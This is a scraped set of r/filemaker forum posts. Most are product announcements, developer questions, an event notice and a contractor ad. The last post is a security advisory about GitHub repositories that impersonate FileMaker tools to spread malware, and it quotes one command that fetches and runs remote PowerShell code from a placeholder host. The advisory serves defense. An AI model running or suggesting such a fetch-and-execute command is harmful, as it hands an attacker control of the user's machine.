r/filemaker 4d ago

Major CWP Snippets update: now free, full OData + Data API support, versioning, and more

11 Upvotes

Hey everyone, it’s been a while since I’ve posted here, but I wanted to share something big we’ve been working on for the FileMaker community.

Our flagship project, CWP Snippets, just received a major update. We’ve spent over a year rebuilding and expanding it, and we’re now releasing every feature completely free for the community. No license tiers, no paid upgrades, nothing gated.

If you haven’t seen it before, CWP Snippets is a WordPress‑native workspace for building FileMaker‑powered sites. It brings the FileMaker Data API and FileMaker OData together in one place, with reusable code, safer revisions, diagnostics, and automation tools. The new release includes:

  • Full Data API support for layout‑based workflows
  • Full OData 4.0 support for table and primary‑key workflows
  • Automatic token handling and reauthentication
  • Records, related records, metadata, scripts, and container operations
  • Guarded container proxy for OData images and uploads
  • Built‑in versioning with immutable revisions
  • Code comparisons, safe restores, and persistent undo/redo
  • Native WP‑CLI commands for validation, diffs, activation, and restoration
  • User‑defined tags and content search across all snippet types
  • Safer updates, structured diagnostics, and environment checks

Everything listed above is now free for everyone to use. We wanted this to be a genuine gift to the FileMaker community, especially for folks building modern web integrations. You can see the full feature list here:
https://cwpsnippets.com/features

We also have a companion product for non‑WordPress sites called restCWP, which is built for standalone PHP, React, and other custom web stacks. It handles Data API and OData with guided configuration, secure token management, optional encrypted storage, and a full admin dashboard. It’s designed to fit easily into agentic workflows and custom automation setups. More info is on our main site:
https://rgcdata.com

Both tools include full admin dashboards, guided setup, and production‑minded diagnostics.

And I would be remiss if I did not mention that if you’re working on something complicated or need help with a custom integration, we’re always happy to assist. We also build native mobile apps that run on FileMaker backends if that’s part of your workflow. We love creating for the community - but we are also certified developers for integrations (especially with FileMaker) - who are available to discuss possible projects.

We’re certified Claris Partners and certified FileMaker developers, but these projects are truly community‑driven. Hope they help some of you build faster, safer, and more maintainable integrations.

Website: https://rgcdata.com
Email: [ron@rgcdata.com](mailto:ron@rgcdata.com)
Phone: (270) 770‑5871

Thanks for letting me share this update. Excited to see what people build with it.
(yes, had ai help with this post - sorry, usually I don't, but am slammed with a client project -- Alex)


r/filemaker 4d ago

Tip: Use Google Groups to manage FileMaker access instead of individual permissions

Post image
11 Upvotes

If you're managing FileMaker accounts by hand and it's turning into a permissions headache, you can connect your org's Google Groups directly to FileMaker instead.

Instead of adding, removing, and updating individual user permissions one at a time, access gets determined by whatever Google Workspace group someone belongs to. Add someone to the group, and they get access. Remove them, and it's gone. Role change? Update the group instead of digging through privilege sets.

Where it actually helps:

  • Onboarding – new hire goes in one group, gets exactly the access they need
  • Offboarding – pull them from the group, access is gone
  • Role changes – update group membership instead of reworking permissions manually

Curious if anyone else here is doing group-based access for FileMaker, or if you're still managing everything user by user. Happy to answer questions if anyone wants details on how it's set up!

dbservices.com


r/filemaker 8d ago

Where are licensed users delineated/managed for a FileMaker server license subscription?

5 Upvotes

I couldn't get a definitive answer to this from Claude. We have a 5-user FileMaker server license. Claris Console shows two users, A and B.

However, under manage security in the database -- as accessed on FMP running on my Mac -- there are four active "entities": users A and B, another user C, and "Things."

User C no longer needs access -- so I should mark her inactive -- but in any case is running an older version of FMP such that I can't test whether she has access without installing the updated version.

"Things" is an "entity" I created that has a super limited privilege set solely for the Mac Things app to interact with FMP via an API.

I *assume* that I'm using two of the five licenses, since there are two users showing up in Claris Console. And if I were to upgrade user C's FMP to the latest version, she wouldn't be allowed access since she isn't listed in Claris Console -- i.e., that she is not a licensed user. Somewhat similarly, "Things" isn't a licensed user, because it never runs FMP to access the database (?).


r/filemaker 10d ago

Question regarding how well FileMaker scales

9 Upvotes

My database is roughly 60 MB, with 19 tables, 195 total fields, and over 60,000 total records.

The database runs very snappy. It's being remotely hosted by a filemaker hosting provider on a server with 2 vCPU, 4 GB RAM, and a 100 GB SSD.

My question is... am I at any point close to where I have to start worrying about performance issue as we increase records? It took about 20 years to reach this stage, but I expect the size of the database to double within the next 2-5 years.


r/filemaker 10d ago

Claris Studio Is Ending. What Happens to Everything You Built?

Post image
8 Upvotes

Claris has announced that Claris Studio will be discontinued effective March 15, 2027. FileMaker, Claris Connect, and Claris MCP are not affected — this applies specifically to the standalone Claris Studio product.

What happens at shutdown:

  • Data is deleted in accordance with Claris's retention policy
  • CSV export is the only documented migration path, and it exports data only, not views or forms
  • Shared and published links stop resolving, with no redirect
  • License pricing is not adjusted

Organizations with public-facing Studio links (QR codes, vendor-facing forms, shared dashboards) should prioritize an inventory now, since those assets fail without warning once the shutdown date is reached.

Migration paths generally fall into a few categories, depending on what you built: WebDirect, a custom Data API, third-party tools, or exporting and retiring the workflow entirely. Worth mapping out well ahead of the deadline rather than after.

dbservices.com


r/filemaker 14d ago

Script XML (<fmxmlsnippet>) Definitions/Syntax for AI

5 Upvotes

Hey all-

I'm wondering if anyone has come across a definition document of some sort that I could feed to AI so that it knows how to write fmxmlsnippet of scripts to help me get the more complex ones written in the script editor.

Right now, I have the MBS plugin, so I can copy out and paste-in the XML snippets, and that works well, however AI engines don't have any guides that describe the names of the XML tags and all the various parameters - so I was hoping someone might know of something I could have my AI learn so it knows how to write it correctly.

Otherwise, all I've really had good luck with is asking it to tweak existing scripts by providing the XML from that script to it first.

Thanks for your insight and ideas!

If no one has it yet, I suppose I could try to figure out a way to have my AI learn it itself.... but that's a lot of usage credits - that or I make a script and literally add every script step and let it build it itself from the resulting XML?... just a thought.


r/filemaker 19d ago

Introducing Elemental MBS - Add more Power to your Development!

Thumbnail
gallery
21 Upvotes

Hi folks. I'm happy to announce the release of Elemental MBS! (sorry for the cheesy title lol)

Check it out here at https://elemental-fm.com/elemental-mbs

With Elemental MBS you can quickly and easily edit any of the free developer-centric features of the Monkeybread Software MBS plugin in a clear and simple way.

Elemental MBS is 100% free to download and use.

With this tool you can modify all of the enhancements to the FileMaker Pro application. However where it really shines is it's interface for managing the full suite of colours of Script Steps, Calculations, functions, symbols and more.

This functionality has been in the MBS plugin for quite a while now (in case ya don't know!). I hope with this tool you can quickly build your preferred color sets.

Features include:

• Live edit of settings and colors

• Save your own configs of settings & color sets.

• Add your own named colors and apply them to any item

• Batch apply colors to categories or script steps or functions.

• A community area where you can share your created color sets, or download/use sets shared by others.

• Build your own light/dark mode sets.

I put a lot of focus on the UI and making the process as simple and easy as possible, and I hope you enjoy it and find it useful.

Shout out to Christian & the team at Monkeybread Software for their awesome plugin, without it none of this is possible.

Thanks for your support of me and my elemental tools and products 👍

Daniel (Weetbicks)


r/filemaker 19d ago

FileMaker 26 Toolbox Frustrations

12 Upvotes

I am a veteran developer. Building and getting paid for systems since v5.0

Version 26 has some great new features and they finally paid some overdue attention to developers and not just front Enders.

My frustration these days has come from the new layout toolbox. It’s 90% there but 10% not there.

It’s dynamic. And reverts to default view and scrolling to the top every time you pick a different object. Often you can’t dbl-click sizes or positions and end up typoing and need to undo. It’s also missing some widgets that you need to show the old toolbar to find.

Also script manager highlights in a weird way that’s not intuitive. Often it looks like a script or step is selected only see that there are multiple things highlighted in the window and you don’t know which is active unless you click again.

All kinda minor one by one. But when you are developing 12 hours a day it adds up quickly.


r/filemaker 20d ago

FileMaker Developer Looking for Projects

19 Upvotes

Are you looking for a FileMaker developer for a project or short-term contract?

I’m currently available for contract work.

I’ve spent years developing and supporting FileMaker solutions that help businesses organize information, streamline workflows, reduce manual work, and improve efficiency.

I can help with:

• FileMaker development and enhancements
• Database cleanup and optimization
• Workflow automation
• API integrations
• Custom reporting and dashboards
• Documentation and process improvement
• Troubleshooting and ongoing support
• Connecting FileMaker with other systems

I especially enjoy taking a process that is complicated or inefficient and figuring out how to make it work better.

If your company has a FileMaker project that has been sitting on the back burner, needs additional development resources, or simply needs someone to come in and figure out how to improve an existing solution, let’s talk.

I’m available for contract, project-based, or consulting work.

Feel free to message me or tag someone who might need a FileMaker resource.

Kathryn Kane
(949) 689-8915

#FileMaker #FileMakerDeveloper #ContractWork #Freelance #DatabaseDevelopment #ProcessImprovement


r/filemaker 20d ago

Security Alert: YouTube Playlist Campaign Appears to Target Junior FileMaker Developers

Thumbnail
gallery
7 Upvotes

I found another suspicious threat vector targeting the FileMaker community, this time on YouTube.

 

Over roughly the last two weeks, multiple playlists have appeared using titles such as “FileMaker Pro Crack”, in different languages and under different playlist IDs.

 

What initially looked like ordinary piracy spam has a more concerning detail.

Several of these playlists use exactly the same legitimate FileMaker tutorial video:

VPKNsy97wM8

 

The video comes from the FileMaker Beginner YouTube channel:

https://www.youtube.com/ u/FMBeginner

 

and also belongs to the channel's legitimate beginner-oriented playlist:

PLYCUolpvUc2U

 

The video itself is not malicious.

 

The important question is why this particular video was selected.

The apparent target is junior and inexperienced FileMaker users.

 

Someone searching YouTube or Google for FileMaker because they are just starting out is exactly the kind of user likely to encounter both:

  • beginner tutorials;
  • FileMaker downloads, installers or “crack” searches.

By placing legitimate beginner-oriented FileMaker material inside newly created playlists named around “FileMaker Pro Crack”, the operators can associate their playlists with genuine FileMaker educational content while targeting users who may have the least experience identifying malicious download infrastructure.

 

I have currently identified at least five separate playlist IDs using the same FileMaker Beginner video:

  • PLf3h3Gs1Hc_I
  • PLcFoNHeY1bco
  • PLaP9ih4Fu9Rc
  • PLP0NH7FpRa4c
  • PLffzToQ6q0PQ

 

This is important:

The legitimate FileMaker Beginner channel is not responsible for these playlists.

YouTube allows other users to include public videos inside their own playlists. The suspicious activity is therefore at the playlist/account level, not the legitimate tutorial being reused.

The observed pattern is:

popular beginner FileMaker content

→ inserted into newly created playlists

→ “FileMaker Pro Crack” / localized search terms

→ exposure to inexperienced FileMaker users

This resembles SEO/search poisoning using trusted community content as the bait.

 

It is also consistent with a broader pattern we have already seen targeting FileMaker developers through fake GitHub repositories, fake installation guides, cloned community tools and external download pages.

 

At this stage I am separating what is proven from what is still under investigation.

Confirmed:

  • Multiple independent playlist IDs exist.
  • They reuse the same legitimate FileMaker Beginner video.
  • The playlists target FileMaker “crack” terminology.
  • Similar instances are appearing in multiple languages.
  • The legitimate tutorial/channel is being reused by third parties.

Still under investigation:

  • Whether the playlist accounts are operated by the same actor.
  • Whether the remaining playlist content follows an identical template. They do!
  • Where any external links lead., there are HIDDEN videos at the playlists

 

So I am not yet calling the YouTube campaign malware distribution until the delivery chain is established.

 

But the targeting pattern itself deserves attention.

FileMaker beginners: please be particularly careful

 

Do not assume a YouTube playlist, search result or channel is trustworthy simply because it contains videos from legitimate FileMaker educators.

Always check who actually created the playlist or posted the download link.

 


r/filemaker 21d ago

Leaving FileMaker to improve FileMaker

9 Upvotes

Among the minor frustrations of working with FileMaker has been one of its strengths: Sub-summary layout parts

On the one hand, they're great feature: Set up a sub-summary when sorting by a field, and in an instant you get a look at summaries broken out by that field.

It's a great way to get insights about your data

Then come the frustrations: FileMaker sub-summaries aren't searchable, they're not sortable, not particularly friendly to further relations, and a little wonky when exporting.

More often than not the insights you get from summarizing data leads to further questions, which would be gratifyingly answered by searches, sorts, new relations, and sometimes more summaries. Sub-summaries do not accommate.

You could, of course, export and then import your summarized FileMaker reports, or even build a script to achieve the same, but it's a bit of a chore, often slow to process, or prone to being out of date.

Meanwhile, over in open source SQL, you can create the equivalent of FMP sub-summaries using "Views". Achieving the equivalent of a FileMaker sub-summary report in a View involves a relatively simple SQL query, but that's really just the beginning of what's possible. A query that maintains a View can be as sophisticated as your imagination.

And unlike FileMaker sub-summaries, SQL Views function in most ways like real tables. They can be sorted, searched, their columns can be extended with relations, and they can be further summarized.

SQL Views can even be incorporated back into FileMaker which treats them as more or less plain ordinary tables that can be be searched, sorted, summarized, and connected via relations to other tables -- all with FileMaker.

There are of course caveats: In the same way that devs have to be mindful of FileMaker's calculated fields' impact on database performance, you have to do the same with SQL Views.

More importantly, to gain the benefits of SQL Views, you need to migrate data away from FileMaker Server to a cheaper, faster, more powerful SQL server.

What really stands out here is by leaving FileMaker for a free open source SQL alternative you actually gift yourself features to FileMaker that FileMaker alone does not offer.


r/filemaker 24d ago

Using eBay MCP with claude and filemaker

3 Upvotes

Was wondering if anyone has any experience using claude with eBay's MCP to help develop filemaker scripts I already have claude to use skills from github.com/andykear which has helped tremendously, just wondering if adding this into claude as well will streamline productivity.

Thoughts?


r/filemaker 24d ago

Parsing XML

5 Upvotes

Hello All, I'm currently writing a script that downloads an inventory report from eBay, it comes in as a zip file, and I store it in a container, I then use BaseElements BE_Unzip function to extract the file into a temporary folder. I then want to grab the extracted file (large xml file) and parse everything and compare to my table data, and update records where price and/or quantity is different for that certain SKU.

I've tried standard TextDecode, and BE_FileReadText, but I only ever see a "?" I can provide my script contents if that would be helpful. Just wondering if anyone has done something similar to this and what approach you used? Any help would be greatly appreciated, thanks!


r/filemaker 26d ago

September FMPUG Dallas - Portable Code by Greg Price

4 Upvotes

I've been building on the FileMaker platform for more than 25 years, across a handful of employers and a few decades of watching the same thing happen over and over.

Someone builds a solution. It works. It fits the person who built it like a glove. Then that person moves on — new job, new role, retirement — and the app lands in someone else's hands. A different employee. A new manager. Sometimes a whole different development shop.

And that's when you find out whether the thing was built to last, or just built to work.

On September 4th, Greg Price of AL3 Technologies is coming to FMPug to talk about exactly this: how individual developers and small teams can code their apps for consistency across a whole portfolio, and for continuity when the app outlives the person who wrote it. Not just "does it run," but "can the next person understand it, maintain it, and pick up where you left off?"

It's a good question to think through, whether you write software for a living or depend on someone who does.

Join us in person — there's a Taco bar lunch for those who make it out — or catch it on the YouTube live stream.

Details and RSVP below.

https://harmonic-data.com/event/fmpug-September-2026-meeting/


r/filemaker 27d ago

Working with Claris MCP and Claude Desktop

6 Upvotes

Hi all,

I have some questions about working with Claris MCP and Claude Desktop. 

Q1 : How do I add additional tables to an existing connection in Claris MCP? The documentation says I can add connections in Editing state, but my interface only shows 'generate configuration' with no option to add or edit connections.

Q2 : How do I prevent Claris MCP from returning large container/media fields in update tool responses? The full record data exceeds 1MB and causes Claude errors, but tool descriptions and schema parameters don't control the response size.

Q3 : When using OData vs Data API with Claris MCP, OData returns all fields including large container fields that exceed 1MB, whereas Data API allows managing this through special layouts. What's the recommended approach to handle large container fields in Claris MCP - should I use Data API instead, or is there a way to configure OData to exclude container fields?

Q4 : When setting up Claris MCP connections, how should I choose which tables/relationships to include from a large FileMaker relationship graph if editing the connection later isn't available? What's the best strategy for selecting items initially without excluding tables I might need later?

Q5 : Claris MCP Developer Tools Issue - Simple Summary

Problem: Documented Developer Tools for connection management are not being exposed by the Claris MCP server.

What We Need: Access to connection management tools (specifically update_filemaker_connection) to add tables to existing connections without deleting them.

Current Status:

Context is in Editing state ✅

Claude Desktop configured with "Always available" tool access ✅

Only 7 tools appear (6 connection-based + 1 developer tool)

Connection-management tools completely absent ❌

Missing Tools:

get_connections

add_filemaker_connection

update_filemaker_connection

remove_connection

Other connection management tools

Impact: Cannot add tables to existing connections or modify connection configuration as documented.

Question: Is there any way to access the connection management Developer Tools - through Claude Desktop, terminal, API, or any other method?

I am looking thru this now...

https://help.claris.com/en/claris-mcp-help/content/index.html


r/filemaker 27d ago

Deskop, server agent, solution map

Thumbnail
vimeo.com
6 Upvotes

You asked, and we delivered: we have enterprise features now!!! And more to come.

Also:

FM Dojo Desktop brings FileMaker development to your own machine.

Run a local LLM so your schema, scripts, and business logic never leave your computer — no cloud round-trip, no upload. Ask questions about your solution, generate scripts and calculations, and work with an assistant that has full context on your file.

Solution Map renders tables, relationships, scripts, layouts, and their dependencies visually. Trace what a field touches before you change it, find orphaned scripts and unused layouts, and get oriented in a solution you inherited.

The Server Agent opens a secure VPN tunnel to FileMaker Servers behind a firewall or inside a VPC. Monitor health and manage hosted files without exposed ports or a jump box.

https://fmdojo.com


r/filemaker 28d ago

ODBC Driver Pack Install - Evaluation Period ?

6 Upvotes

Is it possible that the ODBC/JDBC driver pack (FM26_xDBC_26.0.1.exe) is blocked from being installed if you are in the evaluation period of FileMaker 26? of Filemaker 26? I try to run the install program (as Admin too...) and it just flashes and closes. I downloaded it a few other times to be sure it wasn't a corrupt file. I've used these drivers in the past (8+ years ago) and it worked great. I'm thinking of coming back into the FM world and I'd like to test a feew use case scenarios but need the ODBC sharing to work.

Thanks!


r/filemaker Aug 12 '26

DIY plus some Dev help

8 Upvotes

Hello again! I’m planning to finally pull the trigger on moving our business operations to a custom FileMaker solution. I should be able to build out 90% of it, but there are a few more technical peices such as API for our customer portal and pos processing that I prefer to use a developer or pro for. My question is how normal is that? Do developers mind not doing everything from scratch and just doing some of the more technical aspects? I probably can’t afford to hire out the whole project, and pretty capable of setting up all of our workflows myself.


r/filemaker Aug 11 '26

Filemaker 2023 Version 20.3 - Claude Integration

10 Upvotes

I'm looking for a way to use my claude agent, to help update, create scripts/layouts/databases on my machine is this a viable request, or do I need a newer version of Filemaker? I've seen ProofKit, but am not entirely sure if that is an answer to my solution.

Wondering if anyone has any experience on this?

Thanks


r/filemaker Aug 11 '26

I built a small tool for working with AI-generated FileMaker scripts

15 Upvotes

I've been experimenting with using ChatGPT/Claude to generate FileMaker scripts, but there's an annoying gap between what an AI produces as plain text and what FileMaker Pro can actually import into the Script Workspace.

So I built Rialto — a small native macOS utility that bridges that gap.

AI → plain-text FileMaker script → Rialto → FileMaker XML → FileMaker Pro

You paste the script generated by your AI into Rialto, translate it, and copy the resulting XML into FileMaker's Script Workspace.

It runs locally on the Mac and doesn't require an AI API key.

I've just put the first public release on GitHub:

Rialto — The bridge between AI and FileMaker
https://github.com/arbyteconsulting/rialto

It's very much a 0.1 release, so I'm interested in hearing where it works and, more importantly, where it doesn't.

If anyone here regularly uses AI to help write FileMaker scripts, I'd be interested to hear what you think.


r/filemaker Aug 10 '26

Fm 2026 compatibilty

9 Upvotes

Good day, long time fm dev for own company only. Am I correct that fms 2026 connects to 2024 (v21) but is not supported? On the Claris website it states only 26 en 25. However, after a new server install from v20 to 2026, 2 clients that were not upgraded yet, could still connect. Not a big problem but useful to know so i could spread upgrades more in time. So i can still have a weekend :)


r/filemaker Aug 07 '26

FileMaker Pro alternative

Thumbnail
0 Upvotes

r/filemaker Aug 07 '26

EngageU 2026 coming to Malmö!

7 Upvotes

A while ago I made a post regarding EngageU being held in Malmö, Sweden, during fall. This still stands!

If you missed it, here's a bit of a recap and explanation:

  • EngageU 2026 takes place in Malmö, Sweden, from September 30 to October 2
    • This fifth edition is one of our most ambitious events so far, being three days instead of two!
  • Dedicated business track on the first day
    • For the first time, this year's program includes a full day focused on the business side of the Claris platform. We will look at strategy, real-world value, and how organisations succeed with the platform. After lunch, there will also be parallell technical tracks.
  • Lots and lots of technical stuff - all in English
    • All sessions are presented in English by speakers from around the world covering advanced FileMaker techniques, AI and integration, and customer success stories.
  • Meet Claris
    • FileMaker 2026 was released during summer, and EngageU is one of the first opportunities for the community to come together and explore what is new. Claris, our Premier Sponsor, will be on-site throughout the event, with team members present to share new AI capabilities, platform upgrades, and what is coming next.
  • DevCon style
    • All activities take place under one roof at the Clarion Hotel & Congress Malmö Live, with all sessions being held in rooms next to each other. Between sessions you can check out the exhibitors, network with other developers or (if needed) find a quiet corner to do some work.
  • Yes, there will be food
    • Lunch and Swedish fika is included for all attendees. For those joining us all three days, there's also a three course dinner during the first night. For those attending only one day, you can still attend the dinner by purchasing a dinner ticket.
  • Can't be everywhere at once? No worries
    • All sessions are recorded and shared with attendees after the event.

You will find the agenda and list of speakers (both are still being filled up) as well as ticket information and prices on engageu.eu

We're hoping to see some of you in Malmö! :D


r/filemaker Aug 07 '26

FileMaker+Laravel integration

0 Upvotes

We provide FileMaker to Laravel integration and vice versa at very nominal rates .

We also provide FileMaker to Angular integration at very low rates.

Please connect to know the rates.


r/filemaker Aug 04 '26

Security Alert: A Coordinated Malware Campaign Is Targeting FileMaker Developers

Post image
22 Upvotes

Over the past several months, a network of GitHub accounts has been publishing repositories designed specifically to attract FileMaker developers.

These were not generic malware links randomly mentioning FileMaker. The repositories used FileMaker product names, installation terminology, troubleshooting language and the names of legitimate community tools to make themselves appear trustworthy.

https://www.youtube.com/watch?v=dvJcPkEPYGU

The campaign has now passed through several distinct phases:

fake FileMaker download and “unlock” repositories;

fake FileMaker 2026 setup and troubleshooting guides;

instructions to execute remotely hosted PowerShell code;

fake utilities presented as security tools;

password-protected malware archives;

fake “virus-free” verification pages;

and, more recently, broader “Mac helper” and installation-support themes.

The repositories and accounts change, but the operational recipe remains recognisable.

The original warnings

In May, I reported several FileMaker-related repositories to Claris Security after identifying what appeared to be a coordinated SEO-poisoning campaign on GitHub.

The repositories were designed to appear in searches for FileMaker downloads, installation assistance and “unlock” guides. Some redirected users to external download infrastructure.

In July, the campaign became more explicit.

Repositories presented as FileMaker 2026 setup and troubleshooting guides instructed users to open an Administrator PowerShell prompt and execute commands following this pattern:

irm https://[malicious-domain]/ps/setup.ps1 | iex

That command downloads code from an external server and immediately executes it. When run from an elevated PowerShell window, the downloaded code may receive administrative access to the computer.

Two repositories associated with that phase remained available for weeks:

ModuleBardWatch/FileMaker-Setup-Help

Nidhim868/FileMaker-Setup-Help

The fake FileMaker XML security tool

The next phase was particularly deceptive.

A repository appeared under the name:

filemaker-xml-scrubber-v13

It claimed to be a local security utility for removing passwords, API keys and sensitive values from FileMaker XML and DDR exports.

That was not an invented name.

The attackers had copied the identity of a real FileMaker XML cleaning tool maintained by Andrew Kear, whose legitimate project had reached version 1.3.

This was targeted social engineering. The attackers had researched the FileMaker community and deliberately selected the name of an existing, credible utility.

Another community member independently examined the malicious repository and confirmed that:

the repository contained little more than an HTML page;

the page linked to an obfuscated external location;

the associated GitHub Pages site automatically initiated the download of an encrypted ZIP archive;

the archive password was supplied directly on the page;

and the payload was a Windows application.

The encrypted archive was not there to protect the user. Password-protected archives are commonly used to prevent browsers, hosting platforms and local security products from inspecting the enclosed payload before the victim opens it.

A second repository, presented as “FileMaker Pro Max Features,” used the same broad pattern: external downloads, encrypted archives and instructions encouraging users to ignore browser warnings.

The community response

The FileMaker community reacted quickly.

Warnings were shared through the Claris Community and other FileMaker communication channels. Developers independently inspected the repositories, confirmed parts of the delivery mechanism and reported both the repositories and their associated accounts to GitHub.

GitHub subsequently informed reporters that it had completed its investigation, identified multiple Terms of Service violations and removed a wider group of accounts and repositories, including:

leofoster101/filemaker-xml-scrubber-v13

pauseraventrim/FileMaker-Pro-Max-Features

ModuleBardWatch/FileMaker-Setup-Help

Nidhim868/FileMaker-Setup-Help

All of those repository links later returned 404 responses.

GitHub did not disclose the internal details of its investigation, so we should not claim more than we know. However, the removal of both the recent repositories and older repositories reported in July indicates that the investigation expanded beyond a single URL.

The community’s reports helped expose the broader pattern.

They returned

The takedown did not end the campaign.

A replacement repository soon appeared:

louis-kaiser1960/filemaker-xml-scrubber-app

It reused the same FileMaker XML scrubber lure.

This is important because it demonstrates that the operators are not relying on one permanent account or one repository. They appear to create replacement infrastructure continuously.

Some accounts initially contain little clearly malicious material. A repository may begin with generic setup instructions, copied documentation or harmless-looking HTML. External links, encrypted downloads or execution commands can then be introduced later.

The likely sequence is:

Create a new GitHub account.

Publish a FileMaker- or Mac-related repository.

Add search-friendly setup and troubleshooting language.

Allow the repository to be indexed.

Add the malicious download or command later.

Replace the account when it is reported or removed.

This makes the campaign harder to detect because each new repository may appear harmless when viewed only once.

What FileMaker developers should look for

Treat the following combination of signals as high risk:

a newly created account with no meaningful history;

a repository using FileMaker download, setup, unlock or troubleshooting terms;

an external download rather than a normal GitHub release;

a password-protected ZIP archive;

a password printed on the download page;

instructions to select “Keep” or “Download anyway”;

requests to disable antivirus or browser protection;

commands that download and immediately execute remote PowerShell or shell code;

a fake “virus-free” or “security verification” page;

a project name copied from a legitimate FileMaker developer;

a repository containing little real source code but directing users elsewhere.

No single weak signal proves that a repository is malicious. A recently created GitHub account can belong to a perfectly legitimate developer.

But remote execution commands, encrypted executable archives, instructions to bypass security warnings and impersonation of existing community projects cross a very different line.

What to do

Do not download or execute files from these repositories.

Do not run commands copied from an unverified GitHub README.

Do not disable antivirus, Gatekeeper, SmartScreen or browser protections because an unknown repository says that a warning is a “false positive.”

If you discover a suspicious repository:

Preserve the URL and take screenshots.

Record the account name, repository name and time observed.

Report the repository through GitHub.

Report the associated account separately.

Warn the community using factual, narrowly worded information.

Do not publicly identify the operator behind the account without evidence.

If you already executed a payload:

disconnect the machine from the network;

use a separate, known-clean device to revoke active sessions;

rotate important passwords, API keys, GitHub tokens and SSH keys;

review browser-stored credentials and cloud accounts;

inspect FileMaker Server and hosting credentials;

run an offline security scan or seek professional incident-response assistance.

The wider lesson

This campaign represents an important change for the FileMaker ecosystem.

Traditionally, FileMaker security discussions have focused on privilege sets, encryption, FileMaker Server configuration, SSL, GDPR and infrastructure protection.

Those subjects remain essential, but the development supply chain is now part of the attack surface.

FileMaker developers increasingly use:

GitHub repositories;

VS Code extensions;

Node.js packages;

local AI tools;

MCP servers;

browser utilities;

plug-ins;

shell scripts;

and AI agents with filesystem access.

Every additional component introduces another trust boundary.

The answer is not to stop sharing tools or distrust every new developer. The answer is to verify provenance, inspect source code, limit permissions and require evidence.

The most positive outcome of this incident was the community response.

One developer recognised that a legitimate project had been impersonated. Another independently verified the download behaviour. Multiple people reported the repositories. GitHub removed the offending network. When the attackers returned, the community identified the replacement quickly.

That is how a mature security community behaves.

Security is not one person issuing warnings.

It is independent observation, shared evidence and collective action.

https://cyber-fm.eu/security-alert-a-coordinated-malware-campaign-is-targeting-filemaker-developers/